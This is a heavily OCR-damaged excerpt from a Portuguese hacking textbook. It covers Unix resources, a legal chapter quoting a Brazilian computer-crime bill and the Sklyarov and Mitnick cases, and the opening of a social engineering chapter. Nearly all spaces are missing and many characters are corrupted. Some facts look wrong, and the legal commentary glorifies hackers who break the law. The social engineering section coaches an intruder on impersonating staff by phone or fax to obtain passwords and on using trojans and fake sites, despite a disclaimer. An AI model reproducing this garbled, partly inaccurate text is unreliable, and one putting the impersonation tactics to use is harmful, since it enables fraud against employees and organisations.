OLinuxéhojeumUnix-clonedebaixíssimocustoealtíssimodesempenho.Pro-
jetadoinicialmenteparaolliM-PC,rodaemváriasplataformasdehardwarecomo
mesmocódigoefuncionalidade -feitoaindanãoalcançadopornenhumoutro
sistemaoperacional.
OproblemadoLinuxésuatristefaltadepadrões.Existemcentenasdedistribui-
çõesaoredordoglobo,cadaumacomumaestruturainterna-incluindohierar-
quiadediretórios-própria.Comofrisamosnoiníciodocapítulo,abasedosUnix
éseusistemadearquivos.Issoresultaemsistemasque,apesardepossuíremo.
mesmokernel,sãoincompatíveisentresi.OpadrãoLinuxStandardBaseouLSB
(www.linuxbase.org)éumesforçodasmaioresdistribuiçõesdomundopararesol-
veroproblema.Acredita-sequeempoucosanoshajacompatibilidadetotalentre
todasasdistribuiçõesqueaderiremaopadrão.
ParasabermaissobreoGNU/Linux,omelhorpontodepartidaéositeoficial,
www.linux.org.Paramaisinformações,bastaprocurarporeleemseumecanis-
modebuscafavorito.OGooglepossuiumendereçodedicadoaLinuxem
www.google.com/linux.Hárevistasespecializadasquepodemserconsultadas,
entreelasaRevistadolinux,aArquivolinux,alinuxBR,emuitosbonslivros
podemserencontradosemlivrarias.Masnãodeixedeestudá-lo.Éobrigatório!
odiabinhoqueri...
Linuxnãoésuficientepravocê?Quersaberumasegundaopinião?Experimeite
asvarianteslivresdoUnixdaUniversidadedeBerkeley.Comsuaslicençasme-
nosrestritivasqueaGPL,ossistemas*BSDpodemserusadosemsoluçõesquea
licençadoGNU/Linuxnãopermitiria.Cadaumtemsuascaracterísticas,euma
leituraemseussitesoficiaiscertamenteodeixarátentadoaexperimentá-Ios.
Muitosusuáriosdos*BSD(especialmentedoFreeBSD)saíramdoLinuxedizem
quenãovoltammais.InformaçõessobreoBSDpodemserobtidasem:
~FreeBSD-www.freebsd.org
~OpenBSD-WWTv.openbsd.org
~NetBSD -www.netbsd.org
~OBSDcomercialdaBSDi -www.bsdi.com
1108I
PlataformaUnix[

Universidade1°ano
Voucangoonyourownway...11
Nestaspoucaspáginas,tentamosintroduzirosprincpaisconceitosdossiste-
masUnix.HálivrosinteirosescritosapenassobrepartesdoUnix,portanto,
seriaimprudente(edesonesto)tentarcondensaremumcapítulooconteúdo
deváriosdeles.
MasémuitoimportantequeoleitorestudesobreUnixcomafincoeprocure
outroslivroseoutrasfontes.Visiteregularmentetodosossitesindicadosao
longodocapítuloevasculhe-oscompletamente.Nadaétãopoderosonamão
deumhackerquantoumacontaemumcomputadorUnixligadoàInternet.
11FleetwoodMac,doálbumRumoursde1975.
1109I
]PlataformaUnix

Fundamentos
Jurídicos
Capítulo
'Annescislongasregibusessemanus ?"I
Ovídio,emHeroídes,17:166
1Nãosabescomoasmãosdosreissãocompridas?UmditadopopularfrancêsOesroisont
lesbraslongs-osreistêmosbraçoslongos)éderivadodessetrechodasHeroídes.

IUniversidadeH4CK3R I
Sevocêestálidandocomsituações-limite,nuncaédemaisterumavisãogeral
dosaspectosjurídicosqueasafetamdiretamente.Poucassituaçõessãotão
limítrofesquantoasenfrentadaspelosusuáriosdeinformáticaemgeralepelos
hackerslemespecial.Oqueécrime?Oqueédireito?Oconhecimentoéumadas
principaisarmasdohacker,quedeveestaratentoaosmovimentosfeitospelos
governoseàspolíticasinstituídaspelasempresasquantoàmanipulaçãodeda-
dos.Aignorânciaemrelaçãoàsleispodetrazersériosproblemas,mesmoem
casossimplesemqueousuárioagedeformainocentesemsaberqueestácome-
tendoumcrime.Estaratentoaoscasosquejáocorreram,paraquenãohaja
nenhumadúvidadeondeecomoagir,énomínimoumaatitudesábia.
Apalavralegislaçãonosdáumavagaidéiadeestarlidandocomobemeomal.Há
umagrandediscussãosobrearelatividadedessesconceitos,masdevemosteremmen-
tequeaéticaqueregeopossívelconteúdodessasleispartedanecessidadedeprote-
çãodasempresasedosgovernos.Nemsempreasleissãofeitasparaocidadão,nem
sempreoqueélegalémoralmentecorreto.Portanto,osindivíduosqueaimprensa
simplóriacostumachamardehackersnemsemprepodemsertachadosdebandidos,
embora,segundoalei,geralmenteincomunemcrimesporelaprevistos.RobinHood
eracriminoso,mesmoagindosegundoprincípiosmoraisextremamenteelevados.
Asgrandesestratégiasparaocombateaoscibercrimescomeçaram aser
elaboradasapósosatentadosterroristasocorridosnosEstadosUnidosnodia
11desetembrode2001.Desdeentãoogovernonorte-americanopassoua
ditarodestinodehackersecrackerspelomundo,exigindodetodososoutros
governosleisquefacilitemaingerênciadosEstadosUnidosnessesassuntos;e,
"dequebra",emtodososoutros...
Porquea sociedadetemeoshackers?
Paraasociedade,aimagemdoshackersestáintimamenteligadaaocrime.
Esseestereótipovemdafaltadecompreensãodouniversodigitalemqueestão
inseridos.Elessãovistoscomodestruidoreseladrõesdedados,queseutilizam
demeiosilícitospararoubo,vandalismooulavagemdedinheiro.
Muitodessaimagem
éfrutodadivulgaçãomíopepromovidapelosmeiosde
comunicação.Nuncaooutrolado,oladodounderground,oladodaguerrilha,o
ladodaresistência,
élevadoemconta.Apenasasempresaseosgovernos,al-
gunsdelesautoritários(emboratravestidosdedemocráticos),têmespaçona
mídiaquandoumeventodessesacontece.
Aperguntaqueficaé:vocêrealmenteacreditaemtudooquelê?Talvezo
jornaltelevisivodas21hnãosejaaquelafonteconfiáveldeinformaçãoque
vocêestáacostumadoapensarqueera.
2Fntendaapalavra hackernesseparágrafotantoemseusenddoorigimJl(especiaJista)comonopopular(especia1ista
malvado).Ambosdevemsaberatéondepodemir,ededdirsevãotr.msgredirounãoos(nemsemprejustosou
moralmentecorretos)limiteslegais.
1112I
FundamentosJurídicos[

Universidade1°ano
Asliberdadesindividuaiseo
direitoprivado
Ninguémtemdireitodeinvadiraprivacidadedaspessoas.Mesmoparecen-
doóbvio,afirmaçõescomoessastêmdeserincluídasemqualquerdocumento
ouleiquetratedasgarantiasdeinviolabilidadeprivada.Asconstituiçõesde
quasetodosospaísespossuemalgumdispositivosemelhante,emesmoaDe-
claraçãoUniversaldosDireitosHumanosprevêaproteçãoàvidapessoale
privadadaspessoasjáemseusprimeirosparágrafos.
Oquetristementevemosacontecertodososdias,desdeofimda23Guerra
Mundial,éumrecrudescimentodasleisnacionaisbuscandoummaiorcontrole
dosgovernossobreseuscidadãos.Todososdias,desdeentão,novastecnologias
sãoaplicadasemcontroversosearbitráriossistemasdemonitoração.Coma
desculpadeque"apolíciaprecisafazerseutrabalho",muitaspessoasdurante
todooséculoXXtiveramseustelefonesgrampeados,suascorrespondências
violadas,seuspassosseguidose,nosanos90,suaatividadenaInternetvigiada.
Quantossegredospessoais
-mesmonãosendocrimes-nãoforamrevelados
publicamenteporcontadessaarbitrariedade?
Algunspaísescomeçaramachamarparasiaresponsabilidadedesera"polí-
ciadomundo"e,paratanto,atéhojesubmetemoutrosgovernosmenospodero-
sosàssuaspolíticas.Fingindoestaràcaçadeterroristasoudeprotegero
mundocontraindivíduosperigosos(ejogandonummesmocaldeirãohackers,
terroristas,guerrilheirosecomunistas -quemnãoselembradaguerrafria?),
naçõespoderosasviolamasoberaniadepaíseseimpõemsuascartilhascomer-
ciaisepolíticas.Belamaneiradedisfarçarsegundasintenções,nãoémesmo?
Longedeentrarnessadiscussãopolítica,osautoresqueremchamaraatenção
doleitorparaoperigoincipientedaaprovaçãodeleisoumesmoconstituções
elaboradasparaprotegerosinteressesdeterceirosenãodoscidadãos.Pergun-
teaumadvogadosobreoassunto.Vocêficarásurpresocomaquantidadede
garantiasqueempresasestrangeiraspossuemaquinoBrasilemdetrimentodas
necessidadesbásicasdoscidadãos,sempredeixadasemsegundoplano.
Todamoedatemdoislados.Háhackersagindocomcondutaduvidosa.Há
gentemuitobemtreinadabisbilhotandoseussegredosemcasaounotrabalho.
Hávândalosquefazemtudopeloprazerdedestruir.Assimcomohágovernos
eempresascomintençõesnãomuitonobres,háhackers(enãosãopoucos)
quesão,realmente,criminososedevemserpunidosporisso.Fazerleisque
protejamindivíduoseentidadespúblicaseprivadasdesses"hackersdomal"
semferirosdireitosdeprivacidadedaspessoaséumatarefadificílima.
11131
]FundamentosJurídicos

IUniversidadeH4CK3R !
odireitoàinformaçãoeosataquesà
liberdade
Jáquenãopodemosconfiaremgovernosesuasleis,porqueentãodispararflechas
acusadorassobrepessoasqueoestablishmentconsideracomocriminosas?Usandoo
bomsenso3,qualquerumnaruaperceberiaqueumapessoacomoDmitrySklyarovnão
teveaintençãodeprejudicarumaempresacomoaAdobe,massimalertarospossíveis
usuárioseaprópriaAdobequeseusistemadecriptografiaera(eaindaé)fulho.Masa
empresanãoentendeudessaforma,eusouosdispositivoslegaisprevistospeloDigital
MilleniumCopyrightAct,ofàmigeradoDMCA,paraprocessá-lo.
Esseéumdosmuitoscasosdeleisinjustasoumalidosasquetrabalhamemfavorde
governosougrandesempresasecontraointeressecomum.hnagineempresaseindivídu-
osconfiandocegamentenacriptografiadaAdobeparaprotegerseusdocumentos,se-
jamelessegredosindustriaisoucorrespondêndasamorosas.Comesseprocessocontra
ohackerrusso,aAdobetentouvarrerparadebaixodotapeteosproblemasdesua
tecnologia,emvezdeagradeceraSklyarovoumesmocontratá-Ioparamelhorá-Ia.
Algunsmesesdepois,todosossitesdenoridasdetecnologiadivulgaramatentativada
Microsoftdetransformaremcrimeadivulgaçãodefà.1hasdesoftwarepor"agentesnão
autorizados"(leia-se:euevocê).Comopretextodequeasdivulagaçõesdefà.1has"atrapa-
lhamainovação",tentativascomoessasprocuraminstitudonalizarasujeirasobotapete.
Taliniciativa,naépoca,nãoresultouemumalei.Masnãoesperequeaturmade
Redmondtenhadesistidodaidéia.
Nãosóasempresassãobeneficiadasporessasaberraçõeslegais.Aatualadministração
federaldosFstadosUnidosdaAméricadivulgouumdocumentochamadodeDoutrina
Bush,queescancaraasupremacianorte-americanaeferedefonnapornográficaosdireitos
deddadãosnomundotodoeassoberaniasdetodosospaísesdoglobo.
Todososgovernoseamaioriadasgrandesempresasmanipulamouescondeminfor-
maçõesecriamleisparatornarissolegal,mesmoqueasinformaçõessejamsobrevocê,
caroleitor,ouoafetemdealgumaforma.Portanto,napróximavezemqueumhacker
invadirumsitedogovernoouempresaedivulgarinformaçõesescabrosassobreaadmi-
nistraçãoquevocêpodeterajudadoaeleger,reflitabastanteeuseoseubomsenso(e
nãoosensocomum)paradecidirqueméomocinhoequeméobandido.
Maseoshackersrealmentemaus?Eassituaçõesnão-previstas?Eoshackers"poradden-
te"?Todahistóriatemdoislados,eomoralmentecorretonemsempreéoqueestádentroda
lei.Masalgumasvezesestá."Nãojulgueis,paraquenãosejaisjulgados.Poiscomocritério
comqueju1gardes,sereisjulgados...Portanto,tudoquanto,pois,quereisqueoshomens
vosfaçam,assimfazei~vóstambémaeles..:'(EvangelhodeSãoMateus7:1,2,12).
3Naescolinhadeinglêsaprendemos queanossaexpressão"bomsenso"rraduz-6ecomo"common sense"eminglês.NumalraduÇioliteral,
ocommonsensedosnorte-americanospodeserescritocomosensocomumAdikrençaentreambasasronnas,enrretanto,nãoéapenasliteral.
Ospovoslatinos,europeus,ali'icanoseasiáticostêmessanoÇiodebomsenso:mdocina.tprimeiroatéencontrar"umasoluÇiológica,usando
asabedoriapopular.Jáocommonsensetemumaconotaçãodikrente:usarasconvençõesjáprontaspresentesnaculturaestadunidense,sem
"pararpaIapensar".Portanto,bomsensoéigualapensatantesdeagir.Jácommonsenseésinônimodeidéiapré<:oncebida...
11141
FundamentosJurídicosr

Universidade1°ano
Alegislaçãobrasileira
ograndetnrnfodoshackersbrasileiroséafaltadelegislaçãoapropriadapara
lidarcomoscrimeseletrônicos.AfaltadeleisespecíficastornaoBrasilrunverda-
deiroparaísoparatodootipodeinvasãoemanipulaçãoilícitadedados.Aspuni-
çõesaplicadassãobaseadasemleisqueseaproximamdasituaçãodocrimeeletrô-
nico.Grandepartedoscasosresolvidospelasautoridadesnacionaisérelativaa
casosdepiratariaepedoftlia,enãoinvasãoe"hackeamento"desistemas.
Afaltadeproteçãolegalpreocupamuitoogovernoeasgrandesempresas,
poisestassãoobrigadasagastarquantiaselevadasdedinheirocomsoftwares
eequipamentosparagarantirasegurançadeseusdados,emesmoassimnão
conseguemevitaraaçãodosvândalosdigitais.
Preocupadoscomasituação,váriosdeputadosformularamprojetosdelei
paradeteraaçãodosinvasores.Masdevidoaolentoprocessodeaprovação,à
totalignorânciadosparlamentaresemrelaçãoaoassuntoeàsdiversascorre-
çõesealteraçõesquedevemserfeitasatéquetudoestejaadequado,oshackers
podemcontinuarutilizandosuashabilidadesparacontinuarsuaspesquisas.A
seguir,temosruntrechoespecíficodoprojetodeleicriadopelodeputadoDé-
cioBragaquetratadoscrimesdeinformática:
"Dispõesobreoscrimesdeinformáticaedáoutrasprovidências"
CAPiTULOIII
DOSCRIMESDEINFORMÁTICA
Danoadadoouprogramadecomputador
Art.8°.Apagar,destruir,modiflcaroudequalquerformainutilizar,totalouparci-
almente,dadoouprogramadecomputador,deformaindevidaounãoautorizada.
Pena:detençãodeumatrêsanosemulta.
Parágrafoúnico.Seocrimeécometido:
I-contraointeressedaUnião,Estado,DistritoFederal,Município,órgãoou
entidadedaadministraçãodiretaouindiretaoudeempresaconcessionáriade
serviçospúblicos;
11-comconsiderávelprejuízoparaavítima;
m-comintuitodelucroouvantagemdequalquerespécie,própriaoudeterceiro;
IV-comabusodeconfiança;
V
-pormotivofútil;
W-comousoindevidodesenhaouprocessodeidentificaçãodeterceiro;ou
WI-comautilizaçãodequalqueroutromeiofraudulento.
Pena:detençãodedoisaquatroanosemulta.
Acessoindevidoounãoautorizado
Art.9°.Obteracesso,indevidoounãoautorizado,acomputadorouredede
computadores.
11151
IFundamentosJurídicos

IUniversidadeH4CK3R I
Pena:detençãodeseismesesaumanoemu1ta.
Parágrafoprimeiro.Namesmapenaincorrequem,semautorizaçãoou
indevidamente,obtém,mantémouforneceaterceiroqualquermeiodeidenti-
ficaçãoouacessoacomputadorourededecomputadores.
Parágrafosegundo.Seocrimeécometido:
I-comacessoacomputadorourededecomputadoresdaUnião,Estado,
DistritoFederal,Município,órgãoouentidadedaadministraçãodiretaouindi-
retaoudeempresaconcessionáriadeserviçospúblicos;
II-comconsiderávelprejuízoparaavítima;
111-comintuitodelucroouvantagemdequalquerespécie,própriaoude
terceiro;
IV-comabusodeconfiança;
V-pormotivofútil;
W-comousoindevidodesenhaouprocessodeidentiflcaçãodeterceiro;ou
WI-comautilizaçãodequalqueroutromeiofraudulento.
Pena:detençãodeumadoisanosemulta.
Alteraçãodesenhaoumecanismodeacessoaprogramadecomputadorou
dados
Art.10°.Apagar,destruir,alterar,oudequalquerformainutilizar,senhaou
qualqueroutromecanismodeacessoacomputador,programadecomputador
oudados,deformaindevidaounãoautorizada.
Pena:detençãodeumadoisanosemulta.
Obtençãoindevidaounãoautorizadadedadoouinstmçãodecomputador
Art.11°.Obter,manteroufornecer,semautorizaçãoouindevidamente,dado
ouinstruçãodecomputador.
Pena:detençãodetrêsmesesaumanoemu1ta.
Parágrafoúnico.Seocrimeécometido:
I-comacessoacomputadorourededecomputadoresdaUnião,Estado,
DistritoFederal,Município,órgãoouentidadedaadministraçãodiretaouindi-
retaoudeempresaconcessionáriadeserviçospúblicos;
11-comconsiderávelprejuízoparaavítima;
111-comintuitodelucroouvantagemdequalquerespécie,própriaoude
terceiro;
IV-comabusodeconfiança;
V-pormotivofútil;
W-comousoindevidodesenhaouprocessodeidentiflcaçãodeterceiro;ou
WI-comautilizaçãodequalqueroutromeiofraudu1ento.
Pena:detençãodeumadoisanosemu1ta.
1116I
FundamentosJurídicos[

Universidade1°ano
Violaçãodesegredoarmazenadoemcomputador,meiomagnéticode
naturezamagnética,ópticaousimilar.
Art.12°.Obtersegredos,deindústriaoucomércio,ouinformaçõespessoais
armazenadasemcomputador,rededecomputadores,meioeletrônicodenatu-
rezamagnética,ópticaousimilar,deformaindevidaounãoautorizada.
Pena:detençãodeumatrêsanosemulta.
Criação,desenvolvimentoouinserçãoemcomputadordedadosoupro-
gramadecomputadorcomfinsnocivos
Art.13°.Criar,desenvolverouinserir,dadoouprogramaemcomputadorou
rededecomputadores,deformaindevidaounãoautorizada,comafmalidade
deapagar,destruir,inutilizaroumodiflcardadoouprogramadecomputador
oudequalquerformadiflcultarouimpossibilitar,totalouparcialmente,auti-
lizaçãodecomputadorourededecomputadores.
Pena:reclusãodeumaquatroanosemulta.
Parágrafoúnico.Seocrimeécometido:
I-contrainteressedaUnião,Estado,DistritoFederal,Município,órgãoou
entidadedaadministraçãodiretaouindiretaoudeempresaconcessionáriade
serviçospúblicos;
11-comconsiderávelprejuízoparaavítima;
III-comintuitodelucroouvantagemdequalquerespécie,própriaoude
terceiro;
IV-comabusodeconfiança;
V-pormotivofútil;
VI-comousoindevidodesenhaouprocessodeidentiflcaçãodeterceiro;ou
VII-comautilizaçãodequalqueroutromeiofraudulento.
Pena:reclusãodedoisaseisanosemulta.
Veiculaçãodepornografiaatravésderededecomputadores
Art.14°.Oferecerserviçoouinformaçãodecaráterpornográfico,emredede
computadores,semexibir,previamente,deformafacilmentevisíveledestaca-
da,avisosobresuanatureza,indicandooseuconteúdoeainadequaçãopara
criançaouadolescentes.
Pena:detençãodeumatrêsanosemulta.
Comopodemosnotar,oprojetoéabrangente,lidandocomassuntosquevão
desdeinvasõesatéacriaçãodevíruseprogramasquepossamdanificardados
alheios.Comcerteza,a"naçãohacker"teriaamaioriadosseusatoscoibida
casoaleiestivesseemvigor.Mas,alémdoprocessodeaprovaçãodalei,ogover-
notemdeprovercondiçõesparaqueelassejamexecutadas.
1117I
]FundamentosJurídicos

IUniversidade
Leisinternacionaisapósodia11de
setembrode2001
NosEstadosUnidosdaAmérica
Apósofatídicodia11desetembrode2001,caracterizadopelosatentadosao
WorldTradeCenterepentágono,muitacoisamudouemrelaçãoàvidadoshackers
noâmbitointernacional.Nomesmodiaemqueosaviõesderrubaramastorres
doWTC,osagentesdoFBIjáintimavamosmaioresprovedoresdeacessoa
instalaremosoftwareCarnivore,conhecidopelasuacapacidadedeftltrarmen-
sagensdee-mailembuscadepalavraseexpressõesrelacionadasaoatentado.
Alémdisso,ogovernoamericanodiminuiuosentravesjudiciaisparao
usodeescutastelefônicas,eliminouanecessidadedeprovaseatérevogou
aleiqueproibiaaCIAdeorganizarassassinatoscontrainimigosexternos.
EstudosrealizadospeloPentágonosobreociberterrorismomostraramque
ataquesdecrackerspoderiampararopaís,jáqueosreservatóriosdeágua,
energiaelétricaegássãocontroladosporcentrosdecomputaçãoquepo-
demserinvadidosremotamentedemaneiraridiculamentefácil.
UmadasleiscriadaspelodepartamentofoiaUSAAct,quepossuiuma
seçãoespecialvoltadaparaociberterrorismo.OUSAActprevêpunição
paratodaformadevandalismoeletrônicoquepossaatingirempresase
cidadãos,incluindoinvasõesvindasdeoutrospaíses.Issosignificaque,se
rastreado,oinvasorserápunidodeacordocomasleisinternacionais.
Comasnovasleisemedidasamericanas,oslegisladoresamericanostransfor-
marammilharesdecrackersehackersemterroristaspordefinição.Umdos
parágrafosdaPATRIOT(provideAppropriateToolsRequiredtoInterceptand
ObstructTerrorismAct)dizoseguinte:aqueleque,comconhecimento,cause
transmissãodeumprograma,informação,códigooucomandoe,comoresultado
detalconduta,intencionalmentecausedanosemautorização,paraumcomputa-
dorprotegido[estaráemviolaçãodesteestatuto].Issosignificaque,comofoi
ditoantes,hackersviraramterroristasparaosamericanos.Comosejánãofosse
suficiente,serconsideradoterroristapraticamentesignificaprisãoperpétua.
Estáemelaboraçãoumconjuntodenovasleis(naverdadearatificação
legaldaDoutrinaBush)chamadodeHomelandSecurityAct,quepromete
endurecerocercoaosinimigosdosEstadosUnidosemtodasasfrentes:mi-
litar,comercial,armamentista,políticaedigital.Espereparaverembreve
açõesparamilitaresnorte-americanasemoutrospaísesvisandoprenderou
assassinarpessoasacusadasdehackerismo.
Aleiamericanapodefuncionarcomoummodeloparadefinirospadrõesmundi-
aisquesãodiscutidosanualmentepelaInterpol,quecriouumadivisãoespecial,a
UnidadedeCrimesdeAltaTecnologia,paracombateroscrimeseletrônicos.
1118
I
FundamentosJurídicos[

Universidade1°ano
NaEuropa
AmaiorpartedosgruposeuropeustomoumedidassemelhantesàsdosEsta-
dosUnidos.Todasbaseadasnorastreamentodeinformaçõespessoaissemqual-
queravisoprévio,dandopoderaosseusagentesdevasculharascaixasdemen-
sagensdequalquerprovedor.Aadoçãodopadrãonorte-americanomostramais
umavezqueomundoestápróximodeestabelecerumaforteestratégiadecom-
bateaoscibercrimes,oquevaiprejudicarmuitoaaçãodosvândalosdigitais.
Comoefeitocolateral,ferirátambémalgunsdireitoseaprivacidadedecidadãos
reconhecidamenteinocentes("Matetodos!Umdeleséterrorista...").
Casosdehackersfamosos
Paraogovernoelessãocriminosos.Paraanaçãohacker,heróis.Vamosapre-
sentardoisdoscasosmaisconhecidosdeaplicaçãodeleiscontraoscrimes
eletrônicos.DmitrySklayroveKevinMitnicksãodoisótimosexemplosdecomo
asleisinternacionaisrelacionadasàinvasão,hackeamentodesoftwareeutiliza-
çãodeengenhariasocialsãoaplicadasnarealidade.
orussoque"hackeou"aAdobe
oprogramadorrussoDmitrySklayrovfoiacusadodecomercializaruma
ferramentaquequebraasmedidasdesegurançadoprogramaAdobeBook
ReaderlogoapósdarumapalestrasobresegurançanaDefConemjulhode
2001.OAdvancedeBookProcessorpodequebrarasenhadesegurançacriada
pelaAdobe,transformandoume-bookcriptografadoemumsimplesPDF.Ele
foienquadradonaleiquevisaaproteçãododireitointelectualparaosprodu-
tosdigitais,oDigitalMilleniumCopyrightAct,dispositivohorrendoenazista
maisconhecidocomoDMCA.
ApartemaisestranhaéqueaprópriaAdobedecidiuretirarasacusações.As
críticasinternacionaiseasameaçasdeboicoteforamosprincipaismotivosque
fizeramcomqueaempresafizesseumarevisãodeconsciência.Apesardisso,a
situaçãodeDmitrynãomelhorouemnada,poisogovernoamericanonãoreti-
rouasacusações.
ApóspagarumamultadeUS$50mileficardetidonaCalifórniaporcinco
meses,orussoobtevealiberdadepormeiodeumacordoemqueapoiariao
governonorte-americano.Acondiçãoimpostafoiadeficarsobobservação
duranteumano,esóentãoeleseriaabsolvidocompletamente.
11191
IFundamentosJurídicos

IUniversidadeH4CK3RI
ohackermaisfamosodomundo
Umdosmaioresídolosdanaçãohacker.AhistóriadeKevinMitnickcom
certezadariamaterialparaumaverdadeiraenciclopédia.Em1989foiprocura-
dopeloFBIacusadoderoubarumsoftwaresecretodepesquisadaDigital
EquipmentCorpoEaCortenorte-americanadecretouqueohackerseriapreso
semdireitoàfiança.ACortejustificoudizendoqueelerepresentavaumaame-
açaàcomunidadeemesmoàsegurançanacionalaoutilizarumteclado.
Apósumanodeprisão,Mitnickfoipostoemliberdade,masempoucotempojá
estavaviolandoostermosdesuacondicional.Em1992erasuspeitodeter
crackeadosistemasdeinformáticaeobteracessoaosregistrosdoFBI.Emnovem-
brodomesmoano,Mitnickdesapareceumisteriosamentesemdeixarrastros.As
autoridadesachavamqueeleestariausandofalsasidentidadesparaseesconder.
Em1994,ohackersedeparoucomoespecialistaemsegurançaTsutomu
Shimomura,doCentroNacionaldeSupercomputação,emSanDiego,na
Califórnia.ElehaviaalteradoosistemapessoaldeShimomura,queficouindig-
nado,poisseconsideravaumdosmelhoresespecialistasemsegurançadopaís.
MitnickganhouacessopormeiodeumcomputadordaLoyolaUniversity,de
Chicago,autorizadoamandarinformaçõesparaamáquinadoespecialista.A
partirdesseponto,foiarmadoumesquemaemconjuntocomoFBIparaen-
contrarohacker.Shimomurainstalouumcomputadorparamonitorartodas
asaçõesrealizadasemseupróprioequipamento.
Mitnicknãofaziaidéiadaoperaçãomontadaecontinuoucomosataques.No
dia15defevereirode1995,foilocalizado.Elepassoucincoanosnacadeia
apósinvadirempresascomoaMotorolaeaNokia.Duranteessetempouma
legiãodefãslutouporsualiberdade,organizandomovimentoscomooFree
Mitnick.Eleaindasofreu23acusaçõesfederaisdefraudenosistematelefônico
porusoilegaldecomponentesdeacessoparaevitartarifas,alémdeserconsi-
deradocomo"terroristadainformática"pelogovernoamericano.
1120
I
Fundamentos Jurídicosr

Engenharia
8
Gela
Capítulo
Forhardcashwewil!fieanddeceive.
Andevenourmastersdon'tknowthe
websweweave"7
PinkFloyd,"DogsofWar"
1"Pordinheiro g-rosso nosInentireulOs eeng-anareInos. /
EnemnossosInestressabeuJdasteiasqueteceIIlos':
DotilbumAMomentary LapseofIleason,1987

IUniversidadeH4CK3R I
Estecapítuloébemcurto,secomparadocomosoutros,menostécnicos.Tam-
béméaparentementeomaisdistantedoqueseesperadeumlivrocomoeste.
Masnãoseengane:asinformaçõesaquicontidassãoasmaisimportantesde
todoolivro.Umataquemuitocomplicadopodesetransformaremalgo
simplíssimo,casoaengenhariasocialsejaempregada.Portanto,antesdeque-
braracabeçacomsoluçõespuramentetecnológicas,penseprimeiroqueenga-
naroalvoefazê-Iotrabalharparavocêpeloladodedentroémuitomaisrápido.
Oobjetivodastécnicasaquiapresentadaséaaquisiçãodeinformaçõesvitais
sobreoalvoescolhido.Porinformaçõesvitais,alémdasóbviascomodadosfman-
ceiros,pessoaisehierárquicos,entende-seasidiossincrasiastécnicasepolíticas
daempresa:instalaçõesfisicaselógicas,topologiasderede,políticasdesenhase
chavesdecriptografia.
Otermoengenhariasocialpodeparecernumprimeiromomentoalgodistante
douniversohacker.Basicamente,significaa"garimpagem"deinformaçõesvitais
sobreumadeterminadapessoa,empresa,produtoouorganização.Essasinforma-
çõessãoprovenientesquasesempredepessoaspróximasaoindivíduoaserata-
cadooudopróprioquadrodefuncionárioseclientes-nocasodeempresas.
Dessaforma,podemosencararotermocomosinônimodeespionagem,queutili-
zatáticasquevãodesdecartasetelefonemas,passandoporpesquisasnosdepó-
sitosdelixoatéaabordagempessoal.
Astécnicasdeengenhariasocialexigemumapreparaçãopsicológicaprofunda
econtínua.Ocandidatoainvasordeveestarprontoparaestudarocomporta-
mentodoseualvoeentendermelhorseumodusoperandi,incluindoatéo
monitoramentodehorários.Mesmocominvestimentospesadosnaáreadesegu-
rança,grandepartedasempresas(senãotodas)nãoestápreparadaparalidar
comessefator.Lembre-sedequeoespiãousaráaboavontade,acortesia,ainge-
nuidadedaspessoasemesmoasnormasdaempresaparaenganarasvítimas.
Atencão:issoécrime!
I
Omundodaengenhariasocialpareceseralgomuitotentador.Mas,diferente
doscrimesdigitais,quenãopossuemumalegislaçãobemdefinidanopaís,to-
dasastécnicascitadassãoconsideradascrimespassíveisdepunição,quevão
desdeopagamentodemultasatéadetenção.Ainterpretaçãolegalbaseia-sena
configuraçãodosatosdeengenhariasocialcomofalsidadeideológica,caracte-
rizadapelaincorporaçãodeumaidentidadealheia(impostura)seguidadefraude.
Dependendododestinodadoàsinformaçõesrecebidas(porexemplo,emcaso
defraudefinanceira),oinvasorresponderátambémpelocrimedeestelionato.
Opropósitodestecapítuloédemonstrarsuperficialmenteastécnicasutiliza-
dasnaengenhariasocial.Éimportantequetodosconheçamessastécnicas,mas
nãorecomendamosaninguémutilizá-Ias:pelasleisbrasileirasedamaioriados
paíseselassãoconsideradaspráticascriminosas,compuniçõesbemseveras.
11241
EngenhariaSocial[

Universidade1°Ano
Tiposdeataque
Existembasicamentedoistiposdeataques:odiretoeoindireto.Aeficiência
delesdependedashabilidadespessoaisdohackeredoquantoeleseidentifica
comosprocessos.Normalmente,énecessárioutilizarumacombinaçãodeam-
bosparaobteroresultadodesejado.Parachegaràabordagemdireta,oinvasor
deveterconseguidoumabelacoleçãodeinformaçõesobtidasdemodoindireto.
Sóassimpoderá"saberdoqueestáfalando"quandoabordarumfuncionáriodo
teleatendimentoparaconseguirumasenhadeacessoaosistemaouenviaraque-
lefaxdizendoqueéogerentedafilialsolicitandoinformações.
Ataqueindireto
oataqueindiretoconsistenautilizaçãodeferramentasdeinvasão(como
cavalosdetróiaesitescomcódigomalicioso)edeimpostura(comocartas,
e-mailsesitesfalsoscomaaparênciadosverdadeiros)paraobterinformações
pessoais.Osusuáriosindividuaisdequemohackerextraiosdadossãoapenas
vetoresparaacoletadeinformaçõesdeumaentidademaior
-empresa,orga-
nizaçãoougoverno.Suaintençãonãoéatacarcadaumdessesusuários,esimo
organismomaioraoqualelaspertencem.
Ataquedireto
Sãocaracterizadospelocontatopessoal.Geralmentesãofeitosporfaxou
telefone(emborahackersmaisconfiantesousemfazê-Iospessoalmente...)e
exigemplanejamentodetalhadoeantecipado,váriosplanosdeemergência
paracadaumadasfasesdoataquepreviamenteplanejadaseumpoucode
domartístico.Sim,umbominvasortemaobrigaçãodeserbomator.Estedeve
serbemarticuladoparaqueseuplanonãosejadesmascarado,etambémter
raciocíniorápidoparaencontrarsaídascasoalgoforadoplanejadodêerrado.
Métodosutilizados
Éóbvioquetodoessefalatóriosobreataquesdiretoseindiretoséextrema-
mentevago.Naprática,existemalgumastáticassimplesquedevemserusadas
naelaboraçãodoprocedimentodeataque.Asprincipaisarmasdeumengenhei-
rosocialpodemserdivididasemdoisgrandesgrupos:pesquisaeimpostura.
Comecemospelapesquisa.Aaquisiçãodematerial,comorelatóriosanuaise
listadepagamento,podedarumaótimavisãodahierarquiaadotadanaempresa.
Issoajudamuitonahoradaseleçãodosalvospontuais(lembre-se:umpedacinho
deinformaçãoextraídodecadausuárioresultaemumbolovaliosíssimoquando
reunidoàsoutraspequenasinformaçõesextraídasdosoutrosusuários).Ohacker
podedescobrirquemdetémomaterialnecessárioparaainvasãoeoutrasinforma-
çõesimportantesparaoataque,comodepartamentoemqueapessoatrabalha,
softwaresutilizados,sistemaoperacional,hardwareesistemasempresariais.
1125I
]EngenhariaSocial

IUniversidadeH4CK3R I
Observequenemsempreosdadosúteisestãoescritos:umaanálisedosresulta-
